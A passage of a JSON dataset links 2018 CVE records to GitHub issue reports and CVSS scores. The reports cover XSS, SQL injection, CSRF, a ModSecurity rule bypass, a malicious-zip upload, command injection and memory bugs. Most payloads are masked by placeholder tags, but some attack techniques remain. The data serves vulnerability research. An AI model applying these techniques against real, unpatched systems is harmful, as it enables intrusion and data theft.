  88768. "Issue_Url_old": "https://github.com/instantsoft/icms2/issues/892",
  88769. "Issue_Url_new": "https://github.com/instantsoft/icms2/issues/892",
  88770. "Repo_new": "instantsoft/icms2",
  88771. "Issue_Created_At": "2018-07-17T05:26:28Z",
  88772. "description": "Reflect XSS in redirect url . Hello\uff0c I have found a xss in parameter url. XSS POC: URLTAG FILETAG Discovered by zhihua. EMAILTAG .cn(hackyzh)",
  88773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88774. "severity": "MEDIUM",
  88775. "baseScore": 6.1,
  88776. "impactScore": 2.7,
  88777. "exploitabilityScore": 2.8
  88778. },
  88779. {
  88780. "CVE_ID": "CVE-2018-14423",
  88781. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1123",
  88782. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1123",
  88783. "Repo_new": "uclouvain/openjpeg",
  88784. "Issue_Created_At": "2018-07-17T02:27:04Z",
  88785. "description": "Division by zero vulnerabilities in the function pi_next_pcrl, pi_next_cprl and pi_next_rpcl in PATHTAG Function pi_next_pcrl, pi_next_cprl and pi_next_rpcl have the division by zero vulnerabilities in PATHTAG CODETAG CODETAG CODETAG This issue is same with NUMBERTAG And the patch should be like the patch for NUMBERTAG and so on. APITAG patch for NUMBERTAG ERRORTAG",
  88786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88787. "severity": "HIGH",
  88788. "baseScore": 7.5,
  88789. "impactScore": 3.6,
  88790. "exploitabilityScore": 3.9
  88791. },
  88792. {
  88793. "CVE_ID": "CVE-2018-14434",
  88794. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1192",
  88795. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1192",
  88796. "Repo_new": "imagemagick/imagemagick",
  88797. "Issue_Created_At": "2018-07-04T03:28:11Z",
  88798. "description": "coders/mpc.c colormap potential memory leak bug. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/miff.c Steps to Reproduce the bug locates in URLTAG the code frament is as follows: the code locates in a if block,and we allocate colormap memory in the if block, we freed it in normal branch\uff0cbut forgot free it in exception branch ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
  88799. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88800. "severity": "MEDIUM",
  88801. "baseScore": 6.5,
  88802. "impactScore": 3.6,
  88803. "exploitabilityScore": 2.8
  88804. },
  88805. {
  88806. "CVE_ID": "CVE-2018-14521",
  88807. "Issue_Url_old": "https://github.com/aubio/aubio/issues/187",
  88808. "Issue_Url_new": "https://github.com/aubio/aubio/issues/187",
  88809. "Repo_new": "aubio/aubio",
  88810. "Issue_Created_At": "2018-07-22T11:29:08Z",
  88811. "description": "SEGV signal found when running aubiomfcc. I was running aubiomfcc with a wav file as an input and I got a crash . The address sanitizer reported as: ERRORTAG The input file I give to the program is displayed at: URLTAG The command line is just ./aubiomfcc i testcase1",
  88812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88813. "severity": "HIGH",
  88814. "baseScore": 8.8,
  88815. "impactScore": 5.9,
  88816. "exploitabilityScore": 2.8
  88817. },
  88818. {
  88819. "CVE_ID": "CVE-2018-14837",
  88820. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/673",
  88821. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/673",
  88822. "Repo_new": "wolfcms/wolfcms",
  88823. "Issue_Created_At": "2018-05-03T17:19:44Z",
  88824. "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Description: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Name: Cross Site Scripting Vulnerable URL : URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG From Snippets Tab edit the Name with APITAG \"> APITAG Step NUMBERTAG It will store the Name as javascript code and it will execute cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG XSS Executed Successfully FILETAG It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks. Additional information APITAG CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
  88825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88826. "severity": "MEDIUM",
  88827. "baseScore": 4.8,
  88828. "impactScore": 2.7,
  88829. "exploitabilityScore": 1.7
  88830. },
  88831. {
  88832. "CVE_ID": "CVE-2018-15178",
  88833. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5364",
  88834. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5364",
  88835. "Repo_new": "gogs/gogs",
  88836. "Issue_Created_At": "2018-08-06T06:19:35Z",
  88837. "description": "Insecure function APITAG leads to open redirect vulnerability . Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG . APITAG gif: FILETAG A positive fix might looks like: CODETAG",
  88838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88839. "severity": "MEDIUM",
  88840. "baseScore": 6.1,
  88841. "impactScore": 2.7,
  88842. "exploitabilityScore": 2.8
  88843. },
  88844. {
  88845. "CVE_ID": "CVE-2018-15567",
  88846. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/7",
  88847. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/7",
  88848. "Repo_new": "boiteasite/cmsuno",
  88849. "Issue_Created_At": "2018-08-10T06:24:19Z",
  88850. "description": "APITAG NUMBERTAG has a XSS vulnerability in title.. CODETAG FILETAG FILETAG",
  88851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88852. "severity": "MEDIUM",
  88853. "baseScore": 6.1,
  88854. "impactScore": 2.7,
  88855. "exploitabilityScore": 2.8
  88856. },
  88857. {
  88858. "CVE_ID": "CVE-2018-15846",
  88859. "Issue_Url_old": "https://github.com/mattiapazienti/fledrCMS/issues/2",
  88860. "Issue_Url_new": "https://github.com/mattiapazienti/fledrcms/issues/2",
  88861. "Repo_new": "mattiapazienti/fledrcms",
  88862. "Issue_Created_At": "2018-08-06T01:21:25Z",
  88863. "description": "There is a CSRF vulnerability that can modify the administrator's password. There is a CSRF vulnerability that can change the administrator's password via APITAG POC\uff1a APITAG change the administrator's password CODETAG",
  88864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88865. "severity": "HIGH",
  88866. "baseScore": 8.8,
  88867. "impactScore": 5.9,
  88868. "exploitabilityScore": 2.8
  88869. },
  88870. {
  88871. "CVE_ID": "CVE-2018-16247",
  88872. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/3",
  88873. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/3",
  88874. "Repo_new": "yzmcms/yzmcms",
  88875. "Issue_Created_At": "2018-08-16T05:18:39Z",
  88876. "description": "yzmcms NUMBERTAG SS. FILETAG XSS, payload \uff1a APITAG alert NUMBERTAG APITAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG iCMS_redirect_num NUMBERTAG APITAG joomla_user_state=logged_in; APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG &status NUMBERTAG dosubmit NUMBERTAG FILETAG FILETAG \u2014\u2014\u4e2d\u79d1\u5353\u4fe1\u8f6f\u4ef6\u6d4b\u8bc4\u6280\u672f\u4e2d\u5fc3",
  88877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88878. "severity": "MEDIUM",
  88879. "baseScore": 5.4,
  88880. "impactScore": 2.7,
  88881. "exploitabilityScore": 2.3
  88882. },
  88883. {
  88884. "CVE_ID": "CVE-2018-16370",
  88885. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/2",
  88886. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/2",
  88887. "Repo_new": "lazyphp/pescms-team",
  88888. "Issue_Created_At": "2018-08-30T09:23:52Z",
  88889. "description": "PECSM TEAM NUMBERTAG has a file upload vulnerability in APITAG This page let user upgrade the PESCMS system manually. FILETAG Follow the APITAG funtction,the upload file extension must be \u201czip\u201d FILETAG and follow the unzip function FILETAG Follow the APITAG function and install function,we can see the file decompression in root directory FILETAG FILETAG so,we can create a FILETAG FILETAG and compression it as FILETAG ,and upload the FILETAG , FILETAG at last ,the system decompress evil.zip and FILETAG in root directory. FILETAG",
  88890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88891. "severity": "CRITICAL",
  88892. "baseScore": 9.8,
  88893. "impactScore": 5.9,
  88894. "exploitabilityScore": 3.9
  88895. },
  88896. {
  88897. "CVE_ID": "CVE-2018-16379",
  88898. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/38",
  88899. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/38",
  88900. "Repo_new": "n00dles/ogma-CMS",
  88901. "Issue_Created_At": "2018-08-10T02:20:41Z",
  88902. "description": "There have XSS vulnerability that can excute javascript. There is a XSS vulnerability Open this url \u201c URLTAG \u201c and login in. Select APITAG Options\" Insert the payload APITAG APITAG \" in APITAG Text footer\" and submit. FILETAG Press F NUMBERTAG to open the developer tools. We can see that this dangerous XSS script was inserted into the page without any filtering. CODETAG This means that the script will be executed when the page is opened, which is dangerous. FILETAG Then we go to the homepage \u201c FILETAG \u201d This malicious XSS script is triggered and a pop up dialog displays the current user's cookie value. FILETAG",
  88903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88904. "severity": "MEDIUM",
  88905. "baseScore": 4.8,
  88906. "impactScore": 2.7,
  88907. "exploitabilityScore": 1.7
  88908. },
  88909. {
  88910. "CVE_ID": "CVE-2018-16384",
  88911. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167",
  88912. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1167",
  88913. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  88914. "Issue_Created_At": "2018-08-10T07:24:37Z",
  88915. "description": "Bypass the latest crs NUMBERTAG rc3 rules for SQL injection. Vulnerability demo(php+mysql+apache) FILETAG ERRORTAG Download and install the latest NUMBERTAG rc3 rules and enable blocking protection for testing. I found a way to bypass the rules for SQL injection through black box testing. This method is: {\\ APITAG b} , where a is a special function name, such as if, version, etc., and b is the sql statement to be executed. Using the method to successfully bypass the rules for SQL injection, you can see that the database name was successfully read using the error. CODETAG FILETAG In this way, you can use this method to bypass the crs rules and get any content in the database in the vulnerable system. Please fix this security issue as soon as APITAG You.",
  88916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88917. "severity": "HIGH",
  88918. "baseScore": 7.5,
  88919. "impactScore": 3.6,
  88920. "exploitabilityScore": 3.9
  88921. },
  88922. {
  88923. "CVE_ID": "CVE-2018-16398",
  88924. "Issue_Url_old": "https://github.com/twistlock/authz/issues/50",
  88925. "Issue_Url_new": "https://github.com/twistlock/authz/issues/50",
  88926. "Repo_new": "twistlock/authz",
  88927. "Issue_Created_At": "2018-07-16T12:27:09Z",
  88928. "description": "[security issue]policy bypass. Regular expressions used by Authz are relatively simple and may be bypassed For example, we allow only the docker start in the policy, and docker pause is not allowed. Normal access to URLTAG will be rejected But we can be accessed the url PATHTAG to bypass Authz\u2019s policy restrictions The above regular expression can bypass the Authz limit and run docker pause success",
  88929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  88930. "severity": "HIGH",
  88931. "baseScore": 7.5,
  88932. "impactScore": 3.6,
  88933. "exploitabilityScore": 3.9
  88934. },
  88935. {
  88936. "CVE_ID": "CVE-2018-16412",
  88937. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1250",
  88938. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1250",
  88939. "Repo_new": "imagemagick/imagemagick",
  88940. "Issue_Created_At": "2018-08-19T14:19:35Z",
  88941. "description": "heap buffer overflow bug in APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
  88942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88943. "severity": "HIGH",
  88944. "baseScore": 8.8,
  88945. "impactScore": 5.9,
  88946. "exploitabilityScore": 2.8
  88947. },
  88948. {
  88949. "CVE_ID": "CVE-2018-16552",
  88950. "Issue_Url_old": "https://github.com/MicroPyramid/Django-CRM/issues/68",
  88951. "Issue_Url_new": "https://github.com/micropyramid/django-crm/issues/68",
  88952. "Repo_new": "micropyramid/django-crm",
  88953. "Issue_Created_At": "2018-09-04T13:25:44Z",
  88954. "description": "CSRF vulnerability almost all forms. For example APITAG creation form has no csrf token validation, so that attacker can create own account by sending malicious link POC : CODETAG EXPLOIT REQUEST: POST PATHTAG HTTP NUMBERTAG Host: django APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en GB,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  88955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88956. "severity": "HIGH",
  88957. "baseScore": 8.8,
  88958. "impactScore": 5.9,
  88959. "exploitabilityScore": 2.8
  88960. },
  88961. {
  88962. "CVE_ID": "CVE-2018-16641",
  88963. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1206",
  88964. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1206",
  88965. "Repo_new": "imagemagick/imagemagick",
  88966. "Issue_Created_At": "2018-07-12T07:28:06Z",
  88967. "description": "There is a potential memory leak in codes/tiff.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/tiff.c. Steps to Reproduce As we can see, there is a check for base_image equals to NULL or not in line NUMBERTAG URLTAG At the same time, there are several call to ERRORTAG in line NUMBERTAG line NUMBERTAG line NUMBERTAG and line NUMBERTAG I think base_image should be destroyed firstly before call ERRORTAG Otherwise, there would be a memory leak vulnerability. ERRORTAG System Configuration APITAG APITAG version: latest version Environment APITAG system, version and so on): Additional information: APITAG",
  88968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88969. "severity": "MEDIUM",
  88970. "baseScore": 6.5,
  88971. "impactScore": 3.6,
  88972. "exploitabilityScore": 2.8
  88973. },
  88974. {
  88975. "CVE_ID": "CVE-2018-16710",
  88976. "Issue_Url_old": "https://github.com/foosel/OctoPrint/issues/2814",
  88977. "Issue_Url_new": "https://github.com/octoprint/octoprint/issues/2814",
  88978. "Repo_new": "octoprint/octoprint",
  88979. "Issue_Created_At": "2018-09-07T06:20:39Z",
  88980. "description": "APITAG configuration issues can lead to unauthorized access. Unauthorized access due to configuration issues can download configuration files, download videos, and more. URLTAG FILETAG FILETAG FILETAG",
  88981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  88982. "severity": "CRITICAL",
  88983. "baseScore": 9.1,
  88984. "impactScore": 5.2,
  88985. "exploitabilityScore": 3.9
  88986. },
  88987. {
  88988. "CVE_ID": "CVE-2018-16736",
  88989. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6437",
  88990. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6437",
  88991. "Repo_new": "roundcube/roundcubemail",
  88992. "Issue_Created_At": "2018-09-09T05:25:36Z",
  88993. "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any impact security. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
  88994. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88995. "severity": "MEDIUM",
  88996. "baseScore": 5.4,
  88997. "impactScore": 2.7,
  88998. "exploitabilityScore": 2.3
  88999. },
  89000. {
  89001. "CVE_ID": "CVE-2018-16736",
  89002. "Issue_Url_old": "https://github.com/eagle00789/RC_Filters/issues/19",
  89003. "Issue_Url_new": "https://github.com/eagle00789/rc_filters/issues/19",
  89004. "Repo_new": "eagle00789/rc_filters",
  89005. "Issue_Created_At": "2018-09-09T05:25:13Z",
  89006. "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any impact security. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
  89007. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  89008. "severity": "MEDIUM",
  89009. "baseScore": 5.4,
  89010. "impactScore": 2.7,
  89011. "exploitabilityScore": 2.3
  89012. },
  89013. {
  89014. "CVE_ID": "CVE-2018-16762",
  89015. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/478",
  89016. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/478",
  89017. "Repo_new": "daylightstudio/fuel-cms",
  89018. "Issue_Created_At": "2018-07-09T13:26:39Z",
  89019. "description": "Vulnerability Code Evaluations & SQL Injections. Vulnerability Code Evaluations & SQL Injections Environment Version NUMBERTAG OS : Unix, Windows Web server : Any web server PHP NUMBERTAG Database : Any database Vulnerability Tree NUMBERTAG SQL Injection NUMBERTAG PATHTAG (GET = search_term NUMBERTAG PATHTAG (GET = layout NUMBERTAG PATHTAG (GET = published NUMBERTAG Code Evaluation NUMBERTAG PATHTAG (GET = filter NUMBERTAG fuel/preview (POST = data NUMBERTAG SQL Injection in PATHTAG (GET = search_term) URL: PATHTAG APITAG APITAG APITAG Parameter Name: search_term Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = layout) URL: PATHTAG APITAG APITAG APITAG Parameter Name: layout Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = published) URL: PATHTAG APITAG APITAG APITAG Parameter Name: published Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG Code Evaluation in PATHTAG (GET = filter) URL: PATHTAG APITAG NUMBERTAG b NUMBERTAG Parameter Name: filter Parameter Type: GET Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG Code Evaluation in /fuel/preview (POST = data) URL: PATHTAG Parameter Name: data Parameter Type: POST Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG",
  89020. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89021. "severity": "CRITICAL",
  89022. "baseScore": 9.8,
  89023. "impactScore": 5.9,
  89024. "exploitabilityScore": 3.9
  89025. },
  89026. {
  89027. "CVE_ID": "CVE-2018-17228",
  89028. "Issue_Url_old": "https://github.com/narkisr/nmap4j/issues/9",
  89029. "Issue_Url_new": "https://github.com/narkisr/nmap4j/issues/9",
  89030. "Repo_new": "narkisr/nmap4j",
  89031. "Issue_Created_At": "2018-09-19T02:24:35Z",
  89032. "description": "command execution vulnerability. String path = APITAG String op = \" T4 p NUMBERTAG Nmap4j nmap4j = new Nmap4j(path); APITAG FILETAG \"); APITAG APITAG over here,the APITAG original intention is to receive hosts. When we add custom commands behind it, it will be executed.",
  89033. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89034. "severity": "CRITICAL",
  89035. "baseScore": 9.8,
  89036. "impactScore": 5.9,
  89037. "exploitabilityScore": 3.9
  89038. },
  89039. {
  89040. "CVE_ID": "CVE-2018-17368",
  89041. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/18",
  89042. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/18",
  89043. "Repo_new": "sanluan/publiccms",
  89044. "Issue_Created_At": "2018-09-12T05:24:34Z",
  89045. "description": "There is a brute force vulnerabillity via PATHTAG when I login, i find if i use a wrong username: FILETAG So we can use brute force to get the correct username beacuse the correct username has different response lenth FILETAG after we got the correct username,use the same way to get the correct password FILETAG FILETAG NUMBERTAG redirect means we login successful",
  89046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  89047. "severity": "MEDIUM",
  89048. "baseScore": 5.3,
  89049. "impactScore": 1.4,
  89050. "exploitabilityScore": 3.9
  89051. },
  89052. {
  89053. "CVE_ID": "CVE-2018-17419",
  89054. "Issue_Url_old": "https://github.com/miekg/dns/issues/742",
  89055. "Issue_Url_new": "https://github.com/miekg/dns/issues/742",
  89056. "Repo_new": "miekg/dns",
  89057. "Issue_Created_At": "2018-09-19T07:25:24Z",
  89058. "description": "APITAG parsing error leading to nil pointer dereference. What did I do? APITAG ERRORTAG What happened? ERRORTAG",
  89059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89060. "severity": "HIGH",
  89061. "baseScore": 7.5,
  89062. "impactScore": 3.6,
  89063. "exploitabilityScore": 3.9
  89064. },
  89065. {
  89066. "CVE_ID": "CVE-2018-17846",
  89067. "Issue_Url_old": "https://github.com/golang/go/issues/27842",
  89068. "Issue_Url_new": "https://github.com/golang/go/issues/27842",
  89069. "Repo_new": "golang/go",
  89070. "Issue_Created_At": "2018-09-25T06:25:17Z",
  89071. "description": "PATHTAG APITAG infinite loop via malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? graceful exit What did you see instead? An infinite loop",
  89072. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89073. "severity": "HIGH",
  89074. "baseScore": 7.5,
  89075. "impactScore": 3.6,
  89076. "exploitabilityScore": 3.9
  89077. },
  89078. {
  89079. "CVE_ID": "CVE-2018-18024",
  89080. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1337",
  89081. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1337",
  89082. "Repo_new": "imagemagick/imagemagick",
  89083. "Issue_Created_At": "2018-10-05T12:25:23Z",
  89084. "description": "infinite loop in APITAG of bmp.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG The following code will trigger an infinite loop when open the poc file which take up a lot of memory and cpu. There is a risk of dos. ERRORTAG Steps to Reproduce APITAG poc URLTAG magick convert $poc /dev/null System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  89085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89086. "severity": "MEDIUM",
  89087. "baseScore": 6.5,
  89088. "impactScore": 3.6,
  89089. "exploitabilityScore": 2.8
  89090. },
  89091. {
  89092. "CVE_ID": "CVE-2018-18211",
  89093. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/1",
  89094. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/1",
  89095. "Repo_new": "pbootcms/pbootcms",
  89096. "Issue_Created_At": "2018-10-08T07:21:34Z",
  89097. "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code. URL: FILETAG APITAG This SQL injection requires background api functionality. APITAG FILETAG username=admin password NUMBERTAG When the api function is enabled in the background, the foreground api will have SQL injection. URLTAG POST:contacts[content`) VALUES ( APITAG /distinct/ APITAG /FROM/ /ay_user/ /limit NUMBERTAG e NUMBERTAG a NUMBERTAG mobile NUMBERTAG content NUMBERTAG We can get the admin account name and password APITAG",
  89098. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89099. "severity": "HIGH",
  89100. "baseScore": 8.1,
  89101. "impactScore": 5.9,
  89102. "exploitabilityScore": 2.2
  89103. },
  89104. {
  89105. "CVE_ID": "CVE-2018-18290",
  89106. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/9",
  89107. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/9",
  89108. "Repo_new": "gnat/nc-cms",
  89109. "Issue_Created_At": "2018-10-14T19:20:41Z",
  89110. "description": "nc cms Cross Site Scripting. Hello, I found that this cms may have some security problem you can edit your html on URLTAG url and you can Input any evil js you want APITAG APITAG APITAG",
  89111. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89112. "severity": "MEDIUM",
  89113. "baseScore": 4.8,
  89114. "impactScore": 2.7,
  89115. "exploitabilityScore": 1.7
  89116. },
  89117. {
  89118. "CVE_ID": "CVE-2018-18409",
  89119. "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/195",
  89120. "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/195",
  89121. "Repo_new": "simsong/tcpflow",
  89122. "Issue_Created_At": "2018-10-15T13:58:19Z",
